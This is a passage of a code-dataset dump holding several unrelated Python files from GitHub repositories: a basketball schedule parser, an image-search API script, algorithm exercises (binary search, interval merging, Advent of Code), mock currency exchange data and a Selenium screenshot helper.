pd.read_html(schedule_table.prettify())[0]\n # remove header rows from df\n df = df.drop(df[df['Team'] == '# Games Played'].index)\n df = df.drop(df[df['Team'] == 'Team'].index)\n\n df['Team'] = df['Team'].apply(lambda team: NBA_NAME_TO_ABBREVIATION_MAP[team])\n df.set_index('Team', inplace=True)\n\n return df\n","repo_name":"elnathanau1/fantasy-dashboard","sub_path":"resources/requests/hashtagbasketball_schedule.py","file_name":"hashtagbasketball_schedule.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18878509932","text":"import requests\r\nimport json\r\nimport config\r\n\r\n\r\ndef query(search: str, image_count: int):\r\n api_key = config.SERPAPI_KEY\r\n request_string = \"https://serpapi.com/search.json?engine=yandex_images&text={query}&p={page}&api_key={key}\"\r\n\r\n page = 0\r\n count = 0\r\n items: list[dict] = []\r\n\r\n while count < image_count:\r\n response = requests.get(request_string.format(query=search, page=page, key=api_key)).json()\r\n image_results = response[\"images_results\"]\r\n position: int = image_results[-1][\"position\"]\r\n\r\n for image_result 
in image_results:\r\n image_result[\"page\"] = page\r\n\r\n count = position\r\n items.extend(image_results)\r\n page += 1\r\n print(f\"page {page}; count {count}\")\r\n\r\n with open(\"out/image-query.json\", \"w+\") as file:\r\n result = { \"items\": items }\r\n json.dump(result, file)\r\n\r\n\r\n with open(\"out/image-query-backup.json\", \"w+\") as file:\r\n result = { \"items\": items }\r\n json.dump(result, file)\r\n","repo_name":"gs256/topmaker","sub_path":"image_query.py","file_name":"image_query.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24151647077","text":"# Uses python3\nimport sys\n\n# def binary_search(a, x):\n# left, right = 0, len(a)\n# # write your code here\n\ndef binarySearch (arr, l, r, x): \n# Check base case \n if r >= l: \n\n mid = l + (r - l) // 2\n\n# If element is present at the middle itself \n if arr[mid] == x: \n return mid \n\n# If element is smaller than mid, then it \n# can only be present in left subarray \n elif arr[mid] > x: \n return binarySearch(arr, l, mid-1, x) \n\n# Else the element can only be present # in right subarray \n else: \n return binarySearch(arr, mid + 1, r, x) \n\n else: \n # Element is not present in the array \n return -1\n\ndef linear_search(a, x):\n for i in range(len(a)):\n if a[i] == x:\n return i\n return -1\n\nif __name__ == '__main__':\n data = list(map(int, input().split()))\n n = data[0]\n sorted_arr = data[1:]\n data_element_to_find = list(map(int, input().split()))\n m = data_element_to_find[0]\n ele_to_find_arr = data_element_to_find[1:]\n\n \n for key in ele_to_find_arr:\n res = binarySearch(sorted_arr, 0, len(sorted_arr)-1, key) \n print(res, sep=' ', end=' ', flush=True)\n","repo_name":"tarunkukreja003/Algorithmic-Toolbox-Coursera-Solutions","sub_path":"feAw7ZC0SHOgMO2QtLhz8g_5e2cf32276ab4d838e5a2be642f85567_course1_2001022001/week4_divide_and_conquer/1_binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9104986731","text":"# Solution 1: Sort the intervals by start time and then merge any overlapping intervals.\n\n# Although it appears this solution takes O(nlogn) time, if you code it by\n# using intervals.pop() it actually takes O(n^2).\n\n# This is because removing an element from an array takes O(n) time in the worst case.\n# Careful!!\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n intervals.sort(key=lambda x: x.start)\n i = 1\n while i < len(intervals):\n start1 = intervals[i-1].start\n end1 = intervals[i-1].end\n start2 = intervals[i].start\n end2 = intervals[i].end\n if start2 <= end1:\n intervals.pop(i)\n intervals[i-1].end = max(end1,end2)\n else:\n i += 1\n return intervals\n\n\n# Solution 2: Let's get rid of intervals.pop()\n# Use O(n) extra space to store merged intervals, reduces runtime complexity to O(nlogn)\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n if len(intervals) == 0:\n return intervals\n intervals.sort(key=lambda x:x.start)\n merged = [intervals[0]]\n for interval in intervals:\n if interval.start <= merged[-1].end:\n 
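# overlapping: widen the last merged interval in place (e.g. [1,3] + [2,6] -> [1,6])\n 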
merged[-1].end = max(merged[-1].end, interval.end)\n else:\n merged.append(interval)\n return merged","repo_name":"BlakeBrown/LeetCode-Solutions","sub_path":"56 - Merge Intervals.py","file_name":"56 - Merge Intervals.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"43140572132","text":"\n\nexchange_usd = {\n \"rates\": {\n \"USD\": 1,\n \"AED\": 3.67,\n \"AFN\": 105.07,\n \"ALL\": 106.87,\n \"AMD\": 481.02,\n \"ANG\": 1.79,\n \"AOA\": 538.97,\n \"ARS\": 103.82,\n \"AUD\": 1.38,\n \"AWG\": 1.79,\n \"AZN\": 1.7,\n \"BAM\": 1.71,\n \"BBD\": 2,\n \"BDT\": 86,\n \"BGN\": 1.71,\n \"BHD\": 0.376,\n \"BIF\": 1994.23,\n \"BMD\": 1,\n \"BND\": 1.35,\n \"BOB\": 6.87,\n \"BRL\": 5.53,\n \"BSD\": 1,\n \"BTN\": 74.15,\n \"BWP\": 11.59,\n \"BYN\": 2.57,\n \"BZD\": 2,\n \"CAD\": 1.25,\n \"CDF\": 2000.41,\n \"CHF\": 0.912,\n \"CLP\": 819.84,\n \"CNY\": 6.36,\n \"COP\": 3939.72,\n \"CRC\": 635.62,\n \"CUP\": 24,\n \"CVE\": 96.46,\n \"CZK\": 21.43,\n \"DJF\": 177.72,\n \"DKK\": 6.53,\n \"DOP\": 57.49,\n \"DZD\": 139.57,\n \"EGP\": 15.71,\n \"ERN\": 15,\n \"ETB\": 49.83,\n \"EUR\": 0.875,\n \"FJD\": 2.12,\n \"FKP\": 0.732,\n \"FOK\": 6.53,\n \"GBP\": 0.732,\n \"GEL\": 3.08,\n \"GGP\": 0.732,\n \"GHS\": 6.64,\n \"GIP\": 0.732,\n \"GMD\": 53.45,\n \"GNF\": 9127.6,\n \"GTQ\": 7.7,\n \"GYD\": 209.63,\n \"HKD\": 7.79,\n \"HNL\": 24.5,\n \"HRK\": 6.59,\n \"HTG\": 101.53,\n \"HUF\": 311.51,\n \"IDR\": 14240.71,\n \"ILS\": 3.11,\n \"IMP\": 0.732,\n \"INR\": 74.15,\n \"IQD\": 1463.36,\n \"IRR\": 42171.77,\n \"ISK\": 128.41,\n \"JEP\": 0.732,\n \"JMD\": 154.95,\n \"JOD\": 0.709,\n \"JPY\": 114.09,\n \"KES\": 113.59,\n \"KGS\": 84.84,\n \"KHR\": 4083.65,\n \"KID\": 1.38,\n \"KMF\": 430.37,\n \"KRW\": 1189.41,\n \"KWD\": 0.3,\n \"KYD\": 0.833,\n \"KZT\": 435.15,\n \"LAK\": 11229.58,\n \"LBP\": 1507.5,\n \"LKR\": 202.43,\n \"LRD\": 148.54,\n \"LSL\": 15.37,\n \"LYD\": 4.6,\n \"MAD\": 9.16,\n \"MDL\": 18.02,\n \"MGA\": 3132.94,\n \"MKD\": 53.9,\n \"MMK\": 1779.21,\n \"MNT\": 2869.99,\n \"MOP\": 8.02,\n \"MRU\": 36.41,\n \"MUR\": 43.84,\n \"MVR\": 15.36,\n \"MWK\": 820.19,\n \"MXN\": 20.33,\n \"MYR\": 4.18,\n \"MZN\": 64.34,\n \"NAD\": 15.37,\n \"NGN\": 417.3,\n \"NIO\": 35.37,\n \"NOK\": 8.74,\n \"NPR\": 118.64,\n \"NZD\": 1.47,\n \"OMR\": 0.384,\n \"PAB\": 1,\n \"PEN\": 3.89,\n \"PGK\": 3.51,\n \"PHP\": 51.39,\n \"PKR\": 176.46,\n \"PLN\": 3.97,\n \"PYG\": 6884.13,\n \"QAR\": 3.64,\n \"RON\": 4.32,\n \"RSD\": 103.01,\n \"RUB\": 76.34,\n \"RWF\": 1042.94,\n \"SAR\": 3.75,\n \"SBD\": 7.98,\n \"SCR\": 13.68,\n \"SDG\": 442.15,\n \"SEK\": 8.99,\n \"SGD\": 1.35,\n \"SHP\": 0.732,\n \"SLL\": 11390,\n \"SOS\": 579.91,\n \"SRD\": 21.3,\n \"SSP\": 432.89,\n \"STN\": 21.43,\n \"SYP\": 2524.97,\n \"SZL\": 15.37,\n \"THB\": 33.24,\n \"TJS\": 11.27,\n \"TMT\": 3.5,\n \"TND\": 2.78,\n \"TOP\": 2.26,\n \"TRY\": 13.52,\n \"TTD\": 6.77,\n \"TVD\": 1.38,\n \"TWD\": 27.58,\n \"TZS\": 2317.76,\n \"UAH\": 27.84,\n \"UGX\": 3527,\n \"UYU\": 44.47,\n \"UZS\": 10918.91,\n \"VES\": 4.63,\n \"VND\": 22822.27,\n \"VUV\": 112.62,\n \"WST\": 2.58,\n \"XAF\": 573.82,\n \"XCD\": 2.7,\n \"XDR\": 0.711,\n \"XOF\": 573.82,\n \"XPF\": 104.39,\n \"YER\": 250.64,\n \"ZAR\": 15.37,\n \"ZMW\": 17.14,\n \"ZWL\": 108.71\n }\n}\n\n\nsupported_currencies = [{\"currency\": \"AED\", \"name\": \"UAE Dirham\", \"country\": \"United Arab Emirates\"},\n {\"currency\": \"AFN\", \"name\": \"Afghan Afghani\",\n \"country\": \"Afghanistan\"},\n {\"currency\": \"ALL\", 
\"name\": \"Albanian Lek\",\n \"country\": \"Albania\"},\n {\"currency\": \"AMD\", \"name\": \"Armenian Dram\",\n \"country\": \"Armenia\"},\n {\"currency\": \"ANG\", \"name\": \"Netherlands Antillian Guilder\",\n \"country\": \"Netherlands Antilles\"},\n {\"currency\": \"AOA\", \"name\": \"Angolan Kwanza\",\n \"country\": \"Angola\"},\n {\"currency\": \"ARS\", \"name\": \"Argentine Peso\",\n \"country\": \"Argentina\"},\n {\"currency\": \"AUD\", \"name\": \"Australian Dollar\",\n \"country\": \"Australia\"},\n {\"currency\": \"AWG\", \"name\": \"Aruban Florin\",\n \"country\": \"Aruba\"},\n {\"currency\": \"AZN\", \"name\": \"Azerbaijani Manat\",\n \"country\": \"Azerbaijan\"},\n {\"currency\": \"BAM\", \"name\": \"Bosnia and Herzegovina Mark\",\n \"country\": \"Bosnia and Herzegovina\"},\n {\"currency\": \"BBD\", \"name\": \"Barbados Dollar\",\n \"country\": \"Barbados\"},\n {\"currency\": \"BDT\", \"name\": \"Bangladeshi Taka\",\n \"country\": \"Bangladesh\"},\n {\"currency\": \"BGN\", \"name\": \"Bulgarian Lev\",\n \"country\": \"Bulgaria\"},\n {\"currency\": \"BHD\", \"name\": \"Bahraini Dinar\",\n \"country\": \"Bahrain\"},\n {\"currency\": \"BIF\", \"name\": \"Burundian Franc\",\n \"country\": \"Burundi\"},\n {\"currency\": \"BMD\", \"name\": \"Bermudian Dollar\",\n \"country\": \"Bermuda\"},\n {\"currency\": \"BND\", \"name\": \"Brunei Dollar\",\n \"country\": \"Brunei\"},\n {\"currency\": \"BOB\", \"name\": \"Bolivian Boliviano\",\n \"country\": \"Bolivia\"},\n {\"currency\": \"BRL\", \"name\": \"Brazilian Real\",\n \"country\": \"Brazil\"},\n {\"currency\": \"BSD\", \"name\": \"Bahamian Dollar\",\n \"country\": \"Bahamas\"},\n {\"currency\": \"BTN\", \"name\": \"Bhutanese Ngultrum\",\n \"country\": \"Bhutan\"},\n {\"currency\": \"BWP\", \"name\": \"Botswana Pula\",\n \"country\": \"Botswana\"},\n {\"currency\": \"BYN\", \"name\": \"Belarusian Ruble\",\n \"country\": \"Belarus\"},\n {\"currency\": \"BZD\", \"name\": \"Belize Dollar\",\n \"country\": \"Belize\"},\n {\"currency\": \"CAD\", \"name\": \"Canadian Dollar\",\n \"country\": \"Canada\"},\n {\"currency\": \"CDF\", \"name\": \"Congolese Franc\",\n \"country\": \"Democratic Republic of the Congo\"},\n {\"currency\": \"CHF\", \"name\": \"Swiss Franc\",\n \"country\": \"Switzerland\"},\n {\"currency\": \"CLP\", \"name\": \"Chilean Peso\",\n \"country\": \"Chile\"},\n {\"currency\": \"CNY\", \"name\": \"Chinese Renminbi\",\n \"country\": \"China\"},\n {\"currency\": \"COP\", \"name\": \"Colombian Peso\",\n \"country\": \"Colombia\"},\n {\"currency\": \"CRC\", \"name\": \"Costa Rican Colon\",\n \"country\": \"Costa Rica\"},\n {\"currency\": \"CUP\", \"name\": \"Cuban Peso\", \"country\": \"Cuba\"},\n {\"currency\": \"CVE\", \"name\": \"Cape Verdean Escudo\",\n \"country\": \"Cape Verde\"},\n {\"currency\": \"CZK\", \"name\": \"Czech Koruna\",\n \"country\": \"Czech Republic\"},\n {\"currency\": \"DJF\", \"name\": \"Djiboutian Franc\",\n \"country\": \"Djibouti\"},\n {\"currency\": \"DKK\", \"name\": \"Danish Krone\",\n \"country\": \"Denmark\"},\n {\"currency\": \"DOP\", \"name\": \"Dominican Peso\",\n \"country\": \"Dominican Republic\"},\n {\"currency\": \"DZD\", \"name\": \"Algerian Dinar\",\n \"country\": \"Algeria\"},\n {\"currency\": \"EGP\", \"name\": \"Egyptian Pound\",\n \"country\": \"Egypt\"},\n {\"currency\": \"ERN\", \"name\": \"Eritrean Nakfa\",\n \"country\": \"Eritrea\"},\n {\"currency\": \"ETB\", \"name\": \"Ethiopian Birr\",\n \"country\": \"Ethiopia\"},\n {\"currency\": \"EUR\", \"name\": \"Euro\",\n 
\"country\": \"European Union\"},\n {\"currency\": \"FJD\", \"name\": \"Fiji Dollar\", \"country\": \"Fiji\"},\n {\"currency\": \"FKP\", \"name\": \"Falkland Islands Pound\",\n \"country\": \"Falkland Islands\"},\n {\"currency\": \"FOK\", \"name\": \"Faroese Króna\",\n \"country\": \"Faroe Islands\"},\n {\"currency\": \"GBP\", \"name\": \"Pound Sterling\",\n \"country\": \"United Kingdom\"},\n {\"currency\": \"GEL\", \"name\": \"Georgian Lari\",\n \"country\": \"Georgia\"},\n {\"currency\": \"GGP\", \"name\": \"Guernsey Pound\",\n \"country\": \"Guernsey\"},\n {\"currency\": \"GHS\", \"name\": \"Ghanaian Cedi\",\n \"country\": \"Ghana\"},\n {\"currency\": \"GIP\", \"name\": \"Gibraltar Pound\",\n \"country\": \"Gibraltar\"},\n {\"currency\": \"GMD\", \"name\": \"Gambian Dalasi\",\n \"country\": \"The Gambia\"},\n {\"currency\": \"GNF\", \"name\": \"Guinean Franc\",\n \"country\": \"Guinea\"},\n {\"currency\": \"GTQ\", \"name\": \"Guatemalan Quetzal\",\n \"country\": \"Guatemala\"},\n {\"currency\": \"GYD\", \"name\": \"Guyanese Dollar\",\n \"country\": \"Guyana\"},\n {\"currency\": \"HKD\", \"name\": \"Hong Kong Dollar\",\n \"country\": \"Hong Kong\"},\n {\"currency\": \"HNL\", \"name\": \"Honduran Lempira\",\n \"country\": \"Honduras\"},\n {\"currency\": \"HRK\", \"name\": \"Croatian Kuna\",\n \"country\": \"Croatia\"},\n {\"currency\": \"HTG\", \"name\": \"Haitian Gourde\",\n \"country\": \"Haiti\"},\n {\"currency\": \"HUF\", \"name\": \"Hungarian Forint\",\n \"country\": \"Hungary\"},\n {\"currency\": \"IDR\", \"name\": \"Indonesian Rupiah\",\n \"country\": \"Indonesia\"},\n {\"currency\": \"ILS\", \"name\": \"Israeli New Shekel\",\n \"country\": \"Israel\"},\n {\"currency\": \"IMP\", \"name\": \"Manx Pound\",\n \"country\": \"Isle of Man\"},\n {\"currency\": \"INR\", \"name\": \"Indian Rupee\",\n \"country\": \"India\"},\n {\"currency\": \"IQD\", \"name\": \"Iraqi Dinar\", \"country\": \"Iraq\"},\n {\"currency\": \"IRR\", \"name\": \"Iranian Rial\", \"country\": \"Iran\"},\n {\"currency\": \"ISK\", \"name\": \"Icelandic Króna\",\n \"country\": \"Iceland\"},\n {\"currency\": \"JEP\", \"name\": \"Jersey Pound\",\n \"country\": \"Jersey\"},\n {\"currency\": \"JMD\", \"name\": \"Jamaican Dollar\",\n \"country\": \"Jamaica\"},\n {\"currency\": \"JOD\", \"name\": \"Jordanian Dinar\",\n \"country\": \"Jordan\"},\n {\"currency\": \"JPY\", \"name\": \"Japanese Yen\",\n \"country\": \"Japan\"},\n {\"currency\": \"KES\", \"name\": \"Kenyan Shilling\",\n \"country\": \"Kenya\"},\n {\"currency\": \"KGS\", \"name\": \"Kyrgyzstani Som\",\n \"country\": \"Kyrgyzstan\"},\n {\"currency\": \"KHR\", \"name\": \"Cambodian Riel\",\n \"country\": \"Cambodia\"},\n {\"currency\": \"KID\", \"name\": \"Kiribati Dollar\",\n \"country\": \"Kiribati\"},\n {\"currency\": \"KMF\", \"name\": \"Comorian Franc\",\n \"country\": \"Comoros\"},\n {\"currency\": \"KRW\", \"name\": \"South Korean Won\",\n \"country\": \"South Korea\"},\n {\"currency\": \"KWD\", \"name\": \"Kuwaiti Dinar\",\n \"country\": \"Kuwait\"},\n {\"currency\": \"KYD\", \"name\": \"Cayman Islands Dollar\",\n \"country\": \"Cayman Islands\"},\n {\"currency\": \"KZT\", \"name\": \"Kazakhstani Tenge\",\n \"country\": \"Kazakhstan\"},\n {\"currency\": \"LAK\", \"name\": \"Lao Kip\", \"country\": \"Laos\"},\n {\"currency\": \"LBP\", \"name\": \"Lebanese Pound\",\n \"country\": \"Lebanon\"},\n {\"currency\": \"LKR\", \"name\": \"Sri Lanka Rupee\",\n \"country\": \"Sri Lanka\"},\n {\"currency\": \"LRD\", \"name\": \"Liberian Dollar\",\n \"country\": 
\"Liberia\"},\n {\"currency\": \"LSL\", \"name\": \"Lesotho Loti\",\n \"country\": \"Lesotho\"},\n {\"currency\": \"LYD\", \"name\": \"Libyan Dinar\",\n \"country\": \"Libya\"},\n {\"currency\": \"MAD\", \"name\": \"Moroccan Dirham\",\n \"country\": \"Morocco\"},\n {\"currency\": \"MDL\", \"name\": \"Moldovan Leu\",\n \"country\": \"Moldova\"},\n {\"currency\": \"MGA\", \"name\": \"Malagasy Ariary\",\n \"country\": \"Madagascar\"},\n {\"currency\": \"MKD\", \"name\": \"Macedonian Denar\",\n \"country\": \"North Macedonia\"},\n {\"currency\": \"MMK\", \"name\": \"Burmese Kyat\",\n \"country\": \"Myanmar\"},\n {\"currency\": \"MNT\", \"name\": \"Mongolian Tögrög\",\n \"country\": \"Mongolia\"},\n {\"currency\": \"MOP\", \"name\": \"Macanese Pataca\",\n \"country\": \"Macau\"},\n {\"currency\": \"MRU\", \"name\": \"Mauritanian Ouguiya\",\n \"country\": \"Mauritania\"},\n {\"currency\": \"MUR\", \"name\": \"Mauritian Rupee\",\n \"country\": \"Mauritius\"},\n {\"currency\": \"MVR\", \"name\": \"Maldivian Rufiyaa\",\n \"country\": \"Maldives\"},\n {\"currency\": \"MWK\", \"name\": \"Malawian Kwacha\",\n \"country\": \"Malawi\"},\n {\"currency\": \"MXN\", \"name\": \"Mexican Peso\",\n \"country\": \"Mexico\"},\n {\"currency\": \"MYR\", \"name\": \"Malaysian Ringgit\",\n \"country\": \"Malaysia\"},\n {\"currency\": \"MZN\", \"name\": \"Mozambican Metical\",\n \"country\": \"Mozambique\"},\n {\"currency\": \"NAD\", \"name\": \"Namibian Dollar\",\n \"country\": \"Namibia\"},\n {\"currency\": \"NGN\", \"name\": \"Nigerian Naira\",\n \"country\": \"Nigeria\"},\n {\"currency\": \"NIO\", \"name\": \"Nicaraguan Córdoba\",\n \"country\": \"Nicaragua\"},\n {\"currency\": \"NOK\", \"name\": \"Norwegian Krone\",\n \"country\": \"Norway\"},\n {\"currency\": \"NPR\", \"name\": \"Nepalese Rupee\",\n \"country\": \"Nepal\"},\n {\"currency\": \"NZD\", \"name\": \"New Zealand Dollar\",\n \"country\": \"New Zealand\"},\n {\"currency\": \"OMR\", \"name\": \"Omani Rial\", \"country\": \"Oman\"},\n {\"currency\": \"PAB\", \"name\": \"Panamanian Balboa\",\n \"country\": \"Panama\"},\n {\"currency\": \"PEN\", \"name\": \"Peruvian Sol\", \"country\": \"Peru\"},\n {\"currency\": \"PGK\", \"name\": \"Papua New Guinean Kina\",\n \"country\": \"Papua New Guinea\"},\n {\"currency\": \"PHP\", \"name\": \"Philippine Peso\",\n \"country\": \"Philippines\"},\n {\"currency\": \"PKR\", \"name\": \"Pakistani Rupee\",\n \"country\": \"Pakistan\"},\n {\"currency\": \"PLN\", \"name\": \"Polish Złoty\",\n \"country\": \"Poland\"},\n {\"currency\": \"PYG\", \"name\": \"Paraguayan Guaraní\",\n \"country\": \"Paraguay\"},\n {\"currency\": \"QAR\", \"name\": \"Qatari Riyal\",\n \"country\": \"Qatar\"},\n {\"currency\": \"RON\", \"name\": \"Romanian Leu\",\n \"country\": \"Romania\"},\n {\"currency\": \"RSD\", \"name\": \"Serbian Dinar\",\n \"country\": \"Serbia\"},\n {\"currency\": \"RUB\", \"name\": \"Russian Ruble\",\n \"country\": \"Russia\"},\n {\"currency\": \"RWF\", \"name\": \"Rwandan Franc\",\n \"country\": \"Rwanda\"},\n {\"currency\": \"SAR\", \"name\": \"Saudi Riyal\",\n \"country\": \"Saudi Arabia\"},\n {\"currency\": \"SBD\", \"name\": \"Solomon Islands Dollar\",\n \"country\": \"Solomon Islands\"},\n {\"currency\": \"SCR\", \"name\": \"Seychellois Rupee\",\n \"country\": \"Seychelles\"},\n {\"currency\": \"SDG\", \"name\": \"Sudanese Pound\",\n \"country\": \"Sudan\"},\n {\"currency\": \"SEK\", \"name\": \"Swedish Krona\",\n \"country\": \"Sweden\"},\n {\"currency\": \"SGD\", \"name\": \"Singapore Dollar\",\n \"country\": 
\"Singapore\"},\n {\"currency\": \"SHP\", \"name\": \"Saint Helena Pound\",\n \"country\": \"Saint Helena\"},\n {\"currency\": \"SLL\", \"name\": \"Sierra Leonean Leone\",\n \"country\": \"Sierra Leone\"},\n {\"currency\": \"SOS\", \"name\": \"Somali Shilling\",\n \"country\": \"Somalia\"},\n {\"currency\": \"SRD\", \"name\": \"Surinamese Dollar\",\n \"country\": \"Suriname\"},\n {\"currency\": \"SSP\", \"name\": \"South Sudanese Pound\",\n \"country\": \"South Sudan\"},\n {\"currency\": \"STN\", \"name\": \"São Tomé and Príncipe Dobra\",\n \"country\": \"São Tomé and Príncipe\"},\n {\"currency\": \"SYP\", \"name\": \"Syrian Pound\",\n \"country\": \"Syria\"},\n {\"currency\": \"SZL\", \"name\": \"Eswatini Lilangeni\",\n \"country\": \"Eswatini\"},\n {\"currency\": \"THB\", \"name\": \"Thai Baht\",\n \"country\": \"Thailand\"},\n {\"currency\": \"TJS\", \"name\": \"Tajikistani Somoni\",\n \"country\": \"Tajikistan\"},\n {\"currency\": \"TMT\", \"name\": \"Turkmenistan Manat\",\n \"country\": \"Turkmenistan\"},\n {\"currency\": \"TND\", \"name\": \"Tunisian Dinar\",\n \"country\": \"Tunisia\"},\n {\"currency\": \"TOP\", \"name\": \"Tongan Paʻanga\",\n \"country\": \"Tonga\"},\n {\"currency\": \"TRY\", \"name\": \"Turkish Lira\",\n \"country\": \"Turkey\"},\n {\"currency\": \"TTD\", \"name\": \"Trinidad and Tobago Dollar\",\n \"country\": \"Trinidad and Tobago\"},\n {\"currency\": \"TVD\", \"name\": \"Tuvaluan Dollar\",\n \"country\": \"Tuvalu\"},\n {\"currency\": \"TWD\", \"name\": \"New Taiwan Dollar\",\n \"country\": \"Taiwan\"},\n {\"currency\": \"TZS\", \"name\": \"Tanzanian Shilling\",\n \"country\": \"Tanzania\"},\n {\"currency\": \"UAH\", \"name\": \"Ukrainian Hryvnia\",\n \"country\": \"Ukraine\"},\n {\"currency\": \"UGX\", \"name\": \"Ugandan Shilling\",\n \"country\": \"Uganda\"},\n {\"currency\": \"USD\", \"name\": \"United States Dollar\",\n \"country\": \"United States\"},\n {\"currency\": \"UYU\", \"name\": \"Uruguayan Peso\",\n \"country\": \"Uruguay\"},\n {\"currency\": \"UZS\", \"name\": \"Uzbekistani So'm\",\n \"country\": \"Uzbekistan\"},\n {\"currency\": \"VES\", \"name\": \"Venezuelan Bolívar Soberano\",\n \"country\": \"Venezuela\"},\n {\"currency\": \"VND\", \"name\": \"Vietnamese Đồng\",\n \"country\": \"Vietnam\"},\n {\"currency\": \"VUV\", \"name\": \"Vanuatu Vatu\",\n \"country\": \"Vanuatu\"},\n {\"currency\": \"WST\", \"name\": \"Samoan Tālā\",\n \"country\": \"Samoa\"},\n {\"currency\": \"XAF\", \"name\": \"Central African CFA Franc\",\n \"country\": \"CEMAC\"},\n {\"currency\": \"XCD\", \"name\": \"East Caribbean Dollar\",\n \"country\": \"Organisation of Eastern Caribbean States\"},\n {\"currency\": \"XDR\", \"name\": \"Special Drawing Rights\",\n \"country\": \"International Monetary Fund\"},\n {\"currency\": \"XOF\", \"name\": \"West African CFA franc\",\n \"country\": \"CFA\"},\n {\"currency\": \"XPF\", \"name\": \"CFP Franc\",\n \"country\": \"Collectivités d'Outre-Mer\"},\n {\"currency\": \"YER\", \"name\": \"Yemeni Rial\",\n \"country\": \"Yemen\"},\n {\"currency\": \"ZAR\", \"name\": \"South African Rand\",\n \"country\": \"South Africa\"},\n {\"currency\": \"ZMW\", \"name\": \"Zambian Kwacha\",\n \"country\": \"Zambia\"},\n {\"currency\": \"ZWL\", \"name\": \"Zimbabwean Dollar\",\n \"country\": \"Zimbabwe\"},\n ]\n\n\ndef all_supported_currencies():\n return supported_currencies\n\n\ndef exchange_to():\n return 
exchange_usd\n","repo_name":"Platzi-Master-C8/gethired-jobplacement-salaries-backend","sub_path":"app/exchanges/mockdata/exchenges_mockdata.py","file_name":"exchenges_mockdata.py","file_ext":"py","file_size_in_byte":23012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39164066182","text":"def html_to_png(input_html, output_png=\"./map.png\"):\n    \"\"\"\n    This function opens the html file given to input_html, takes a screenshot of it, and saves it\n    as a png file.\n\n    Parameters\n    ----------\n    input_html : str\n        Relative path and name of the input html file. e.g., \"./map.html\" \n    output_png : str\n        Relative path and name of the output png file\n\n    Returns\n    -------\n    Nothing\n    \"\"\"\n    import os\n    import time\n    from selenium import webdriver\n    from selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\n    # delay is needed to give enough time for browser to load input_html file\n    delay=5\n\n    # construct the full path for input_html\n    input_url='file://{path}/{mapfile}'.format(path=os.getcwd(),mapfile=input_html)\n\n    # launch firefox\n    capabilities = webdriver.DesiredCapabilities().FIREFOX\n    capabilities[\"marionette\"] = False\n    #binary = FirefoxBinary(\"/usr/lib/firefox/firefox\")\n    #browser = webdriver.Firefox(firefox_binary=binary)\n    browser = webdriver.Firefox()\n    #browser = webdriver.Chrome()\n\n    # open the html file in a browser\n    browser.get(input_url)\n\n    #Give the map some time to load\n    time.sleep(delay)\n    \n    # save the screen as png\n    browser.save_screenshot(output_png)\n\n    # exit from the browser\n    browser.quit()\n\n    return\n\n","repo_name":"MuhammadVT/bike_sharing","sub_path":"data_exploration/html_to_png.py","file_name":"html_to_png.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72079743185","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nsplit_data = True\ncompleted = True\nraw_data = None # Not To be touched\n\ndef part1(data):\n\tpipePoints = {}\n\n\tfor line in data:\n\t\tstart, end = line.split(' -> ')\n\t\tx1, y1 = start.split(',')\n\t\tx2, y2 = end.split(',')\n\t\tx1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n\n\t\t# Finding the direction of the pipe\n\t\tif x1 == x2: # vertical line (x is constant)\n\t\t\tsmallY, BigY = (y1, y2) if y1 < y2 else (y2, y1)\n\t\t\tfor y in range(smallY, BigY+1):\n\t\t\t\tif (x1, y) not in pipePoints: pipePoints[(x1, y)] = 0 \n\t\t\t\tpipePoints[(x1, y)] += 1\n\t\telif y1 == y2: # horizontal line (y is constant)\n\t\t\tsmallX, BigX = (x1, x2) if x1 < x2 else (x2, x1)\n\t\t\tfor x in range(smallX, BigX+1):\n\t\t\t\tif (x, y1) not in pipePoints: pipePoints[(x, y1)] = 0 \n\t\t\t\tpipePoints[(x, y1)] += 1\n\n\t# Counting the number of points with overlaps\n\treturn sum(1 for overlap in pipePoints.values() if overlap >= 2)\n\nfrom itertools import cycle\ndef part2(data):\n\tpipePoints = {}\n\n\tfor line in data:\n\t\tstart, end = line.split(' -> ')\n\t\tx1, y1 = start.split(',')\n\t\tx2, y2 = end.split(',')\n\t\tx1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n\n\t\t# Calculating the x and y ranges of the pipe\n\t\tx_range = range(x1, x2+1) if x2 > x1 else range(x1, x2-1, -1)\n\t\ty_range = range(y1, y2+1) if y2 > y1 else range(y1, y2-1, -1)\n\n\t\t# Now we apply cycle to the shorter point range.\n\t\t# This will deal with the horizontal and vertical pipes :)\n\t\tif len(x_range) < len(y_range): x_range = cycle(x_range)\n\t\telif len(y_range) < len(x_range): y_range = 
